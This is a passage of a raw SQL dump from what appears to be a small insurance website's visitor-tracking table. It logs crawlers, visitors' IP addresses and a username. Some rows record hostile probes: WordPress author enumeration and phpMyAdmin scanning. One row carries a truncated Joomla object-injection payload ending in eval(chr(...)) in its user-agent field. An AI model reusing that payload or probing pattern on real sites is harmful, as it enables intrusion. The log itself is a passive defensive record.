(compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9242,'0b_39aaf202e276fdff853775860aa1d74d','1459063089','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9245,'0b_2849f201debd57a761c6b1f44ff2dd9a','1459063090','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9246,'0b_39aaf202e276fdff853775860aa1d74d','1459063090','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9248,'0b_39aaf202e276fdff853775860aa1d74d','1459063091','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9251,'0b_39aaf202e276fdff853775860aa1d74d','1459063092','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9254,'0b_a545a54ee4d43f09e7a704f1a20fde2f','1459063145','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9255,'0b_a545a54ee4d43f09e7a704f1a20fde2f','1459063146','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9257,'0b_a545a54ee4d43f09e7a704f1a20fde2f','1459063147','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9258,'0b_9e09796f72752113be2d0d89b5f35f93','1459063481','104.223.228.12','mta11.evobootsmall.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(9261,'0b_9e09796f72752113be2d0d89b5f35f93','1459063483','104.223.228.12','mta11.evobootsmall.com','/?author=1','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(9264,'0b_9e09796f72752113be2d0d89b5f35f93','1459063484','104.223.228.12','mta11.evobootsmall.com','/author/admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(9267,'0b_9e09796f72752113be2d0d89b5f35f93','1459063485','104.223.228.12','mta11.evobootsmall.com','/?author=2','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(9270,'0b_9e09796f72752113be2d0d89b5f35f93','1459063486','104.223.228.12','mta11.evobootsmall.com','/?author=3','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(9273,'0b_9e09796f72752113be2d0d89b5f35f93','1459063488','104.223.228.12','mta11.evobootsmall.com','/?author=4','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(9276,'0b_9e09796f72752113be2d0d89b5f35f93','1459063489','104.223.228.12','mta11.evobootsmall.com','/?author=5','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(9278,'0b_5d327df6cc4775812b57cad25c6d05f5','1459066553','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/crafting-an-essay-9/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9281,'0b_8a03700969ac7297a2cc8f39f3bd2955','1459067077','23.108.99.186','23.108.99.186.rdns.as15003.net','/our-team','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'MacOSX','Chrome 48','','','','','','','','0','0',0),(9282,'0b_f075ef60f589311d69650cb876922bf3','1459067078','107.183.255.183','266w8z.dailycoupapp.com','/our-hours','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'MacOSX','Chrome 48','','','','','','','','0','0',0),(9285,'0b_17b5e106e9498f00dc118ecc6f25043d','1459067078','23.108.99.229','23.108.99.229.rdns.as15003.net','/contact-us','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'MacOSX','Chrome 48','','','','','','','','0','0',0),(9287,'0b_7190be13f2450106c4309c884f35debc','1459067077','45.59.20.195','45.59.20.195','/team','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'MacOSX','Chrome 48','','','','','','','','0','0',0),(9288,'0b_a11bae6ceff1cea67647a4e4edbd963d','1459067086','23.80.143.160','23.80.143.160.rdns.as15003.net','/contact','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'MacOSX','Chrome 48','','','','','','','','0','0',0),(9291,'0b_9c44afaba8626f21482c6373f625e97d','1459067087','23.80.156.3','23.80.156.3.rdns.as15003.net','/our-location','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'MacOSX','Chrome 48','','','','','','','','0','0',0),(9293,'0b_856eea813e03883380216e254bf4c239','1459067088','23.80.157.83','23.80.157.83.rdns.as15003.net','/info','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'MacOSX','Chrome 48','','','','','','','','0','0',0),(9296,'0b_e118b491824b3ef1391315014590d7f2','1459067088','23.81.244.216','23.81.244.216.rdns.as15003.net','/about-us','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'MacOSX','Chrome 48','','','','','','','','0','0',0),(9299,'0b_7190be13f2450106c4309c884f35debc','1459067079','45.59.20.140','45.59.20.140','/about','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'MacOSX','Chrome 48','','','','','','','','0','0',0),(9300,'0b_a11bae6ceff1cea67647a4e4edbd963d','1459067089','23.80.143.160','23.80.143.160.rdns.as15003.net','/contact/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'MacOSX','Chrome 48','','','','','','','','0','0',0),(9302,'0b_e118b491824b3ef1391315014590d7f2','1459067089','23.81.244.231','23.81.244.231.rdns.as15003.net','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'MacOSX','Chrome 48','','','','','','','','0','0',0),(9303,'0b_e118b491824b3ef1391315014590d7f2','1459067089','23.81.244.216','23.81.244.216.rdns.as15003.net','/about-us/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'MacOSX','Chrome 48','','','','','','','','0','0',0),(9305,'0b_7190be13f2450106c4309c884f35debc','1459067089','45.59.20.140','45.59.20.140','/about-us/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'MacOSX','Chrome 48','','','','','','','','0','0',0),(9306,'0b_03ce30889d06992c3d78373bd3ed084c','1459067961','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(9309,'0b_76e5a0c4b9e729ef9a8e8b322adc4adb','1459068379','66.249.75.103','crawl-66-249-75-103.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9311,'0b_98862a772bee5daf5ba5e6dc190d9e62','1459068388','66.249.75.96','crawl-66-249-75-96.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9312,'0b_fdc85ffa7d9a85aba2937e60155dbd70','1459068562','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9314,'0b_1770e800a1e6c782d305054e6874af9a','1459075529','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(9317,'0b_1770e800a1e6c782d305054e6874af9a','1459075530','68.180.230.123','b115363.yse.yahoo.net','/comments/feed/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(9320,'0b_3fa45fa4f7f313535199b6f7c1a7c881','1459076486','192.187.114.10','code-mode.cakestandchar.net','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(9323,'0b_3fa45fa4f7f313535199b6f7c1a7c881','1459076486','192.187.114.10','code-mode.cakestandchar.net','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(9326,'0b_3fa45fa4f7f313535199b6f7c1a7c881','1459076487','192.187.114.10','code-mode.cakestandchar.net','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(9329,'0b_2da253a114e5edfd2e0a1714addeb22a','1459080675','68.180.230.123','b115363.yse.yahoo.net','/register','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(9330,'0b_2da253a114e5edfd2e0a1714addeb22a','1459080676','68.180.230.123','b115363.yse.yahoo.net','/register/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(9333,'0b_3d2312980dabf891aabb9d1672017dbc','1459084192','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9335,'0b_70c9fb2a6f06b4763aab1e641f47d8d0','1459086385','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9338,'0b_8c24498bb2063709320eb71e82f4d6c5','1459088816','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9341,'0b_ba3476a108ca8e24a08ef63ac6acb63c','1459089282','100.43.81.146','spider-100-43-81-146.yandex.com','/SSO/235_19.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(9344,'0b_bde111ee89708df1176a166986833159','1459089440','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(9345,'0b_55da5091e6888a006d5ded685c2f1c1e','1459090716','208.115.111.66','208-115-111-66-reverse.wowrack.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9348,'0b_378bd8fac2e7e2c01c2f033dc0f6fcbf','1459091190','184.154.36.163','scan21.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9350,'0b_378bd8fac2e7e2c01c2f033dc0f6fcbf','1459091193','184.154.36.163','scan21.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9351,'0b_378bd8fac2e7e2c01c2f033dc0f6fcbf','1459091195','184.154.36.163','scan21.sitelock.com','/about-us/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9353,'0b_378bd8fac2e7e2c01c2f033dc0f6fcbf','1459091198','184.154.36.163','scan21.sitelock.com','/home/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9356,'0b_378bd8fac2e7e2c01c2f033dc0f6fcbf','1459091200','184.154.36.163','scan21.sitelock.com','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9359,'0b_378bd8fac2e7e2c01c2f033dc0f6fcbf','1459091205','184.154.36.163','scan21.sitelock.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9362,'0b_dbffdb6556e0a5700c64100552138041','1459093214','199.30.24.104','msnbot-199-30-24-104.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b','http://www.empireins.com/','',0,'MacOSX','Safari 9537','','','','BingBot','','','','0','0',0),(9365,'0b_605c3262c64d4e81e67a664d7c2dbade','1459103736','66.249.73.202','crawl-66-249-73-202.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(9366,'0b_952a1991b49004601d22b35c5c14b087','1459103737','66.249.73.169','crawl-66-249-73-169.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(9368,'0b_ab4bf93c4acdd29e7385c11d2aa7129b','1459104417','66.249.83.217,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(9369,'0b_63fbb0fce442387d05653b62cdbca551','1459104941','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(9372,'0b_63fbb0fce442387d05653b62cdbca551','1459104952','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(9375,'0b_63fbb0fce442387d05653b62cdbca551','1459104972','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(9377,'0b_63fbb0fce442387d05653b62cdbca551','1459104991','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(9378,'0b_b8e5fe6f24859aa409d019a91f1f4151','1459105753','192.3.145.138','host.colocrossing.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(9380,'0b_6a52a53f861f1c55bc012f72da7ced95','1459110055','45.35.92.160','unassigned.psychz.net','/carriers/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36','http://www.empireins.com/','',0,'Linux','Chrome 39','us','','','','','','','0','0',0),(9381,'0b_e40a741adca5b07ff8999ff48c1793a4','1459110087','80.255.192.237','80.255.192.237','/phpMyAdmin/index.php','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8','','',0,'MacOSX','Firefox 3','us','','','','','','','0','0',0),(9384,'0b_a37250251574d5fc2e8645e3789a091a','1459111076','68.180.230.123','b115363.yse.yahoo.net','/?page_id=169','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','3','0',0),(9386,'0b_9892efb321a34c7af718837072a63ec1','1459112176','74.68.59.70','cpe-74-68-59-70.nj.res.rr.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.surancebay.com/surancebays-clients-business-teams-2.html','',0,'Win8','Chrome 49','us','1366 x 768','','','','','','0','0',0),(9389,'0b_9892efb321a34c7af718837072a63ec1','1459112179','74.68.59.70','cpe-74-68-59-70.nj.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1366 x 768','','','','','','0','0',0),(9390,'0b_9892efb321a34c7af718837072a63ec1','1459112186','74.68.59.70','cpe-74-68-59-70.nj.res.rr.com','/contact/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1366 x 768','','','','','','0','0',0),(9392,'0b_9892efb321a34c7af718837072a63ec1','1459112190','74.68.59.70','cpe-74-68-59-70.nj.res.rr.com','/about-us/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/contact/','',0,'Win8','Chrome 49','us','1366 x 768','','','','','','0','51',0),(9395,'0b_a05a77675647212f1f750975bec2c74c','1459116040','50.116.16.218','li403-218.members.linode.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36','','',0,'MacOSX','Chrome 45','','','','','','','','0','0',0),(9396,'0b_95207aa4760d0dd26e52f000b0eb5b5d','1459116327','66.249.73.169','crawl-66-249-73-169.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9398,'0b_004320bb6f6b769c2b8c10e8ca30a782','1459117066','66.249.73.169','crawl-66-249-73-169.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(9399,'0b_c277e0fba6c9903582a0d2a297c3b4a6','1459120823','66.249.73.169','crawl-66-249-73-169.googlebot.com','/insentives/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9402,'0b_7d48b5b77a6af2fc5e61b550db99cf0c','1459121404','5.153.233.130','5.153.233.130','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(9404,'0b_7d48b5b77a6af2fc5e61b550db99cf0c','1459121414','5.153.233.130','5.153.233.130','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(9405,'0b_7d48b5b77a6af2fc5e61b550db99cf0c','1459121424','5.153.233.130','5.153.233.130','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(9408,'0b_6cb96a62f31e12a575f21640cbce3d8b','1459123473','123.125.71.86','baiduspider-123-125-71-86.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(9410,'0b_dec8962067223d90aaff7d08db2000f6','1459123861','195.154.200.68','195-154-200-68.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(9413,'0b_dec8962067223d90aaff7d08db2000f6','1459123863','195.154.200.68','195-154-200-68.rev.poneytelecom.eu','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(9416,'0b_dec8962067223d90aaff7d08db2000f6','1459123865','195.154.200.68','195-154-200-68.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(9417,'0b_dec8962067223d90aaff7d08db2000f6','1459123866','195.154.200.68','195-154-200-68.rev.poneytelecom.eu','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(9419,'0b_dec8962067223d90aaff7d08db2000f6','1459123869','195.154.200.68','195-154-200-68.rev.poneytelecom.eu','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(9422,'0b_81bb13e96b8f1d38b32f94ca6025e296','1459124147','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9425,'0b_b00b6065cc668c306ec5db36943371bd','1459126659','5.153.233.130','5.153.233.130','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(9428,'0b_b00b6065cc668c306ec5db36943371bd','1459126669','5.153.233.130','5.153.233.130','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(9429,'0b_b00b6065cc668c306ec5db36943371bd','1459126680','5.153.233.130','5.153.233.130','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(9432,'0b_c2daaed3840f0e4747555a8b2dc74dc4','1459127309','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','ykaufman','','0','0',0),(9435,'0b_85225e27b356bbc3b1c71eaaa9d1d231','1459127414','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9437,'0b_f4d74e5a6956aba2826120100969592e','1459127487','192.187.114.10','code-mode.cakestandchar.net','/','}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:2:\\\"fc\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:8:\\\"feed_url\\\";s:119:\\\"eval(chr(112).chr(1','','',0,'','','','','','Feed Reader','feed reader','','','0','0',0),(9438,'0b_b73c229f67afea2c88a03b2d71ec971f','1459127725','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(9441,'0b_b73c229f67afea2c88a03b2d71ec971f','1459127729','141.8.143.242','spider-141-8-143-242.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(9444,'0b_1692ec3524889077452e7c4c1b3ad505','1459128101','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9446,'0b_3c6bf4e3a6e4dd5d6db673d1d3eab295','1459130044','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9449,'0b_6ff709280bb7269bf9e169ed6e03ef49','1459132237','100.43.81.146','spider-100-43-81-146.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(9450,'0b_b6eb5bdd56bd52c85166cb3610df2e3f','1459133770','100.43.91.1','spider-100-43-91-1.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','tr','','','Yandex','','','','0','0',0),(9453,'0b_0bae2dc1b2a6151f7ce0b0af876e648f','1459134686','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9456,'0b_8fcfdf8c3acaddb9a64662f61e8ea769','1459135878','100.43.91.26','spider-100-43-91-26.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(9459,'0b_93d3f071a9fbe884131a30dd3236b230','1459137916','100.43.91.11','spider-100-43-91-11.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(9462,'0b_e1f66f1a97e85c893c738bc9de987505','1459138981','208.54.86.230','me65636d0.tmodns.net','/','Mozilla/5.0 (iPhone; CPU 